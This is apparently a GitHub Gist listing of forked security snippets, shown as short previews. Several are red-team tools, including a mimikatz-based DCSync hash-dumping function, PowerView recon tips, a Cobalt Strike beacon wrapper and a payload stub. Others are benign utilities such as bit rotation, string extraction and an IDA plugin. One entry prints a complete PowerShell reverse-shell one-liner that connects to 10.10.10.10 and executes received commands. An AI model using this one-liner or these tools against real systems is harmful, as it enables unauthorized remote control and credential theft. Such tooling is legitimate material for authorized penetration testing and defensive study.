ilbaroni ilbaroni
ilbaroni
/ Invoke-DCSync.ps1
Created
May 1, 2019 08:42
— forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
ilbaroni
/ rol-ror.py
Created
July 28, 2019 02:19
— forked from trietptm/rol-ror.py
python rol, ror operation implement
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################################################################### | |
| # Rotating bits (tested with Python 2.7) | |
| from __future__ import print_function # PEP 3105 | |
| # max bits > 0 == width of the value in bits (e.g., int_16 -> 16) | |
| # Rotate left: 0b1001 --> 0b0011 | |
| rol = lambda val, r_bits, max_bits: \ | |
| (val << r_bits%max_bits) & (2**max_bits-1) | \ |
ilbaroni
/ amsi-eicar.py
Created
September 8, 2019 16:04
— forked from ek-nath/amsi-eicar.py
Demo python script for AMSI API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python Port of https://gist.github.com/richinseattle/1cafd9368890ecf3d8e1dbbc18f2fe38 | |
| from ctypes import HRESULT, windll, POINTER, byref | |
| from ctypes.wintypes import HANDLE, LPCWSTR, UINT, LPCSTR | |
| from enum import IntEnum | |
| from comtypes.hresult import S_OK | |
| class AMSI_RESULT(IntEnum): | |
| AMSI_RESULT_CLEAN = 0, | |
| AMSI_RESULT_NOT_DETECTED = 1 |
ilbaroni
/ powershell_reverse_shell.ps1
Created
November 15, 2019 17:12
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
ilbaroni
/ PowerView-3.0-tricks.ps1
Created
November 20, 2019 21:26
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
ilbaroni
/ sharpgen.cna
Created
January 30, 2020 20:54
— forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
| $sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
| $temppath = "/tmp/"; | |
| beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
| alias sharpgen{ | |
| $executionId = "sharpgen_" . int(rand() * 100000); | |
| $temporaryCsharp = $temppath . $executionId . ".cs"; | |
| $executableFilename = $temppath . $executionId . ".exe"; |
ilbaroni
/ bin2sc.py
Created
March 23, 2020 22:33
— forked from superkojiman/bin2sc.py
Convert bin to shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
ilbaroni
/ blockdlls_gadget2jscript.cs
Created
March 26, 2020 20:59
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
ilbaroni
/ strings.py
Created
July 17, 2020 00:49
— forked from herrcore/strings.py
Extract ASCII and Unicode strings using Python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ########################################################################################################## | |
| ## | |
| ## Like steroids for your strings! | |
| ## | |
| ## Original idea: @williballenthin | |
| ## Original link: https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2 | |
| ## | |
| ## Lipstick and rouge by: @herrcore |
ilbaroni
/ HexCopy.py
Last active
March 2, 2021 22:33
— forked from herrcore/HexCopy.py
IDA Plugin for quickly copying disassembly as encoded hex bytes (updated for IDA 7xx) - IDA Python 3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################################ | |
| ## | |
| ## One-Click Hex Copy! | |
| ## | |
| ## Updated for IDA 7.xx | |
| ## | |
| ## All credit for actual IOCTL decode logic: | |
| ## http://www.osronline.com/article.cfm?article=229 | |
| ## | |
| ## Big thanks to @gaasedelen for the IDA 7 update ideas: |
OlderNewer